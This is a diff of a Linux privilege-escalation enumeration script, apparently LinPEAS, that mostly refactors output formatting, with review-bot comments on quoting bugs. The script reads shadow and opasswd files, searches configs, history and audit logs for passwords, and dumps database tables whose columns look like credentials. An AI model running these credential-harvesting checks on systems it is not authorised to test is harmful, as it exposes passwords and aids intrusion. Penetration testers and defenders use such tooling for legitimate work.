[ "$IAMROOT" ] && [ "`find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges over `find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'`" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi fi echo "" ##-- IF) Hashes in passwd file - printf $Y"[+] "$GREEN"Hashes inside passwd file? ........... "$NC - if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Hashes inside passwd file? ........... " + if [ "`grep -v '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null`" ]; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Writable in passwd file - printf $Y"[+] "$GREEN"Writable passwd file? ................ "$NC - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IF) Credentials in fstab - printf $Y"[+] "$GREEN"Credentials in fstab/mtab? ........... 
"$NC - if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Credentials in fstab/mtab? ........... " + if [ "`grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null`" ]; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Read shadow files - printf $Y"[+] "$GREEN"Can I read shadow files? ............. "$NC - if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + print_list "Can I read shadow files? ............. " + if [ "`cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null`" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IF) Read opasswd file - printf $Y"[+] "$GREEN"Can I read opasswd file? ............. "$NC + print_list "Can I read opasswd file? ............. " if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" else echo_no fi ##-- IF) network-scripts - printf $Y"[+] "$GREEN"Can I write in network-scripts? ...... 
"$NC - if [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," - elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "`find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" ]; then echo "You have write privileges on `find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null`" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IF) Read root dir - printf $Y"[+] "$GREEN"Can I read root folder? .............. "$NC + print_list "Can I read root folder? .............. 
" (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no echo "" - + ##-- IF) Root files in home dirs - printf $Y"[+] "$GREEN"Searching root files in home dirs (limit 30)\n"$NC - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m,") || echo_not_found + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${SED_RED},") || echo_not_found echo "" ##-- IF) Others files in my dirs if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Searching folders owned by me containing others files on it\n"$NC - (find / -type d -user "$USER" -d 1 -not -path "/proc/*" 2>/dev/null | while read d; do find "$d" -maxdepth 1 ! -user "$USER" -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IF) Readable files belonging to root and not world readable if ! [ "$IAMROOT" ]; then - printf $Y"[+] "$GREEN"Readable files belonging to root and readable by me but not world readable\n"$NC - (find / -type f -user root ! 
-perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,"; fi; done) || echo_not_found + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - printf $Y"[+] "$GREEN"Modified interesting files in the last 5mins (limit 100)\n"$NC - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," + + ##-- IF) Modified interesting files into specific folders in the last 5mins + print_2title "Modified interesting files in the last 5mins (limit 100)" + find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! 
-path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" ##-- IF) Writable log files - printf $Y"[+] "$GREEN"Writable log files (logrotten) (limit 100)\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation\n"$NC + print_2title "Writable log files (logrotten) (limit 100)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" logrotate --version 2>/dev/null || echo_not_found "logrotate" lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=`find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100` printf "%s\n" "$logfind" | while read log; do - if [ -w "$log" ] || [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found + if ! [ "$IAMROOT" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && [ `echo "$log" | grep -E "$Wfolders"` ]; then #Only print info if something interesting found if [ "`echo \"$log\" | grep \"You_can_write_more_log_files_inside_last_directory\"`" ]; then printf $ITALIC"$log\n"$NC; - elif [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif [ -w "$log" ]; then echo "Writable: $log"; - elif [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g"; + elif ! 
[ "$IAMROOT" ] && [ -w "$log" ] && [ "`command -v logrotate 2>/dev/null`" ] && [ "`logrotate --version 2>&1 | grep -E ' 1| 2| 3.1'`" ]; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && [ "`echo \"$log\" | grep -E \"$Wfolders\"`" ] && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; fi fi done 
@@ -3113,66 +3038,65 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then echo "" ##-- IF) Files inside my home - printf $Y"[+] "$GREEN"Files inside $HOME (limit 20)\n"$NC + print_2title "Files inside $HOME (limit 20)" (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found echo "" ##-- IF) Files inside /home - printf $Y"[+] "$GREEN"Files inside others home (limit 20)\n"$NC + print_2title "Files inside others home (limit 20)" (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found echo "" ##-- IF) Mail applications - printf $Y"[+] "$GREEN"Searching installed mail applications\n"$NC + print_2title "Searching installed mail applications" ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" echo "" ##-- IF) Mails - printf $Y"[+] "$GREEN"Mails (limit 50)\n"$NC - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed "s,root,${C}[1;32m&${C}[0m,g") || echo_not_found + print_2title "Mails (limit 50)" + (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found echo "" ##-- IF) Backup folders - printf $Y"[+] "$GREEN"Backup folders\n"$NC - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${C}[1;31m&${C}[0m,g"; + print_2title "Backup folders" + printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; ls -l "$b" 2>/dev/null && echo "" done echo "" ##-- IF) Backup files - printf $Y"[+] "$GREEN"Backup files (limited 
100)\n"$NC - backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${C}[1;31m&${C}[0m,g"; - fi; + print_2title "Backup files (limited 100)" + backs=`find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null` + printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; done echo "" ##-- IF) DB files - printf $Y"[+] "$GREEN"Searching tables inside readable .db/.sql/.sqlite files (limit 100)\n"$NC - dbfiles=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*\.db$|.*\.sqlite$|.*\.sqlite3$' | grep -E -v '/man/.*|/usr/.*|/var/cache/.*' | head -n 100) + print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" FILECMD="`command -v file 2>/dev/null`" - if [ "$dbfiles" ]; then - printf "%s\n" "$dbfiles" | while read f; do + if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [ "$FILECMD" ]; then - echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: `file \"$f\"`" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${C}[1;31m&${C}[0m,g"; + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; fi done SQLITEPYTHON="" - 
printf "%s\n" "$dbfiles" | while read f; do + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if ([ -r "$f" ] && [ "$FILECMD" ] && [ "`file \"$f\" | grep -i sqlite`" ]) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC if [ "`command -v sqlite3 2>/dev/null`" ]; then tables=`sqlite3 $f ".tables" 2>/dev/null` - #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" elif [ "`command -v python 2>/dev/null`" ] || [ "`command -v python3 2>/dev/null`" ]; then SQLITEPYTHON=`command -v python 2>/dev/null || command -v python3 2>/dev/null` tables=`$SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null` - #printf "$tables\n" | sed "s,user.*\|credential.*,${C}[1;31m&${C}[0m,g" + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" else tables="" fi 
@@ -3189,8 +3113,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 #Check found columns for interesting fields
 INTCOLUMN=`echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt"`
 if [ "$INTCOLUMN" ]; then
- printf $B" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${C}[1;31m&${C}[0m,g"
- printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${C}[1;31m&${C}[0m,g"
+ printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
+ printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
 (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
 fi
 done
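Review bot: The changed `printf "$columns\n" | sed ... |$t,${SED_RED},g"` line still uses the column list as the printf format string and splices the table name into the sed regex unescaped, so a `%` in a column name or a `,`, `|` or `.` in a table name read from an arbitrary .db file on the host breaks the output or the whole sed expression. `printf '%s\n' "$columns"` fixes the first; for the second, drop `|$t` from the alternation or escape the name before use. The unchanged `sqlite3 $f "select * from $t"` context line interpolates the same untrusted names into SQL and into the Python one-liner, so any quoting fix should cover it too. The enclosing loop over `$tables` starts outside the hunk.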
@@ -3202,72 +3126,36 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 echo ""
 ##-- IF) Web files
- printf $Y"[+] "$GREEN"Web files?(output limit)\n"$NC
+ print_2title "Web files?(output limit)"
 ls -alhR /var/www/ 2>/dev/null | head
 ls -alhR /srv/www/htdocs/ 2>/dev/null | head
 ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
 ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
 echo ""
- ##-- IF) Interesting files
- printf $Y"[+] "$GREEN"Readable hidden interesting files\n"$NC
- printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC
- fils=$(echo "$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_MNT\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '\.msmtprc|\.env|\.google_authenticator|\.recently-used.xbel|\.lesshst|.*_history|\.sudo_as_admin_successful|\.profile|.*bashrc|.*httpd\.conf|.*\.plan|\.htpasswd|\.gitconfig|\.git-credentials|\.git|\.svn|\.rhosts|hosts\.equiv')
- printf "%s\n" "$fils" | while read f; do
- if [ -r "$f" ]; then
- ls -ld "$f" 2>/dev/null | sed "s,\.msmtprc|\.env|.google_authenticator|_history|\.lesshst|.recently-used.xbel|\.sudo_as_admin_successful|.profile|bashrc|httpd.conf|\.plan|\.htpasswd|.gitconfig|\.git-credentials|.git|.svn|\.rhosts|hosts.equiv|\.ldaprc,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g";
- if [ "`echo \"$f\" | grep \"_history\"`" ]; then
- printf $GREEN"Searching possible passwords inside $f (limit 100)\n"$NC
- cat "$f" | grep -aE "$pwd_inside_history" | sed '/^.\{150\}./d' | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," | head -n 100
- echo ""
- elif [ "`echo \"$f\" | grep \"httpd.conf\"`" ]; then
- printf $GREEN"Checking for creds on $f\n"$NC
- cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" | grep -E "htaccess|htpasswd" | grep -v "^$" | sed -${E} "s,htaccess.*|htpasswd.*,${C}[1;31m&${C}[0m,"
- echo ""
- elif [ "`echo \"$f\" | grep \"htpasswd\"`" ]; then
- printf $GREEN"Reading $f\n"$NC
- cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"
- echo ""
- elif [ "`echo \"$f\" | grep \"ldaprc\"`" ]; then
- printf $GREEN"Reading $f\n"$NC
- cat "$f" | grep -v "^#" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"
- echo ""
- elif [ "`echo \"$f\" | grep \"\.env\"`" ]; then
- printf $GREEN"Reading $f\n"$NC
- cat "$f" | grep -v "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${C}[1;31m&${C}[0m,"
- echo ""
- elif [ "`echo \"$f\" | grep \"\.msmtprc\"`" ]; then
- printf $GREEN"Reading $f\n"$NC
- cat "$f" | grep -v "^#" | sed -${E} "s,user.*|password.*,${C}[1;31m&${C}[0m,"
- echo ""
- fi;
- fi;
- done
- echo ""
- ##-- IF) All hidden files
- printf $Y"[+] "$GREEN"All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)\n"$NC
- find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "\.env|\.google_authenticator|_history$|\.recently-used.xbel|\.lesshst|.sudo_as_admin_successful|\.profile|\.bashrc|\.plan|\.htpasswd|.gitconfig|\.git-credentials|\.rhosts|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
+ print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
+ find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
 echo ""
 ##-- IF) Readable files in /tmp, /var/tmp, bachups
- printf $Y"[+] "$GREEN"Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)\n"$NC
+ print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
 filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70`
 printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
 echo ""
 ##-- IF) Interesting writable files by ownership or all
 if ! [ "$IAMROOT" ]; then
- printf $Y"[+] "$GREEN"Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n"$NC
- printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC
+ print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
+ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
 #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
 obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500`
 printf "%s\n" "$obmowbe" | while read entry; do
 if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then
 printf $ITALIC"$entry\n"$NC;
- elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then
- echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m,"
+ elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then
+ echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
 else
- echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m,"
+ echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
 fi
 done
 echo ""
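Review bot: The new `grep -Ev "$INT_HIDDEN_FILES"` in the "All hidden files" check produces no output at all when that variable is empty or unset, because `grep -Ev ""` excludes every line; the inline pattern it replaces could not be empty. Defaulting it, `grep -Ev "${INT_HIDDEN_FILES:-^\$}"`, or skipping the filter when the variable is empty, keeps the listing from silently disappearing. The whole "Readable hidden interesting files" block (history-file password search, .env/.htpasswd/.ldaprc/.msmtprc readers) is removed here and nothing in this hunk replaces it; if that coverage moved to the `PSTORAGE_*` machinery used elsewhere in the diff, a one-line comment at the removal point would say so. The enclosing `IntFiles` block starts and ends outside the hunk.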
@@ -3275,17 +3163,17 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 ##-- IF) Interesting writable files by group
 if ! [ "$IAMROOT" ]; then
- printf $Y"[+] "$GREEN"Interesting GROUP writable files (not in Home) (max 500)\n"$NC
- printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files\n"$NC
- for g in `groups`; do
- printf " Group "$GREEN"$g:\n"$NC;
+ print_2title "Interesting GROUP writable files (not in Home) (max 500)"
+ print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
+ for g in `groups`; do
+ printf " Group "$GREEN"$g:\n"$NC;
 iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500`
 printf "%s\n" "$iwfbg" | while read entry; do
 if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then
 printf $ITALIC"$entry\n"$NC;
- elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then
- echo "$entry" | sed -${E} "s,$writeVB,${C}[1;31;103m&${C}[0m,"
+ elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then
+ echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
 else
- echo "$entry" | sed -${E} "s,$writeB,${C}[1;31m&${C}[0m,"
+ echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
 fi
 done
 done
@@ -3293,73 +3181,72 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 fi
 ##-- IF) Passwords in config PHP files
- printf $Y"[+] "$GREEN"Searching passwords in config PHP files\n"$NC
- configs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E '.*config.*\.php|database.php|db.php|storage.php|settings.php')
- printf "%s\n" "$configs" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${C}[1;31m&${C}[0m,g"; done
+ print_2title "Searching passwords in config PHP files"
+ printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
 echo ""
 ##-- IF) TTY passwords
- printf $Y"[+] "$GREEN"Checking for TTY (sudo/su) passwords in audit logs\n"$NC
- aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${C}[1;31m&${C}[0m,g"
- find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${C}[1;31m&${C}[0m,g" | sed -${E} "s,data=.*,${C}[1;31m&${C}[0m,g"
+ print_2title "Checking for TTY (sudo/su) passwords in audit logs"
+ aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
